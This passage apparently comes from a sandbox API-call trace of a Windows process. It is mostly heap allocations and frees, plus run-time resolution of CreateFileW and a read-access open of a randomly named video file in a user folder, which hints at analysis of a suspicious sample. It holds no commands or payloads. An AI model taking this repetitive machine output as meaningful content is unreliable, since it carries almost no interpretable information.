hHeap=0x1780000) returned 1 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0099.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0099.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0099.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0099.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0099.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0099.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0099.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0099.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0099.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0099.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0099.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0099.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0099.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0099.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0099.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0099.248] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0099.248] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0099.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0099.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.248] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0099.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca6d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0099.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0099.249] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0099.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0099.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0099.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0099.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0099.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0099.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0099.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0099.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0099.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.249] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0099.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0099.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0099.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0099.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0099.250] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\NLad7.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\nlad7.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0099.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0099.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0099.250] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.250] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0099.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0099.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0099.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0099.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0099.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0099.251] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0099.251] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.252] FreeLibrary (hLibModule=0x772d0000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.252] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0099.253] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.253] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0099.254] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0099.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0099.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0099.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca0a0, cbMultiByte=12, lpDefaultChar=0x0, 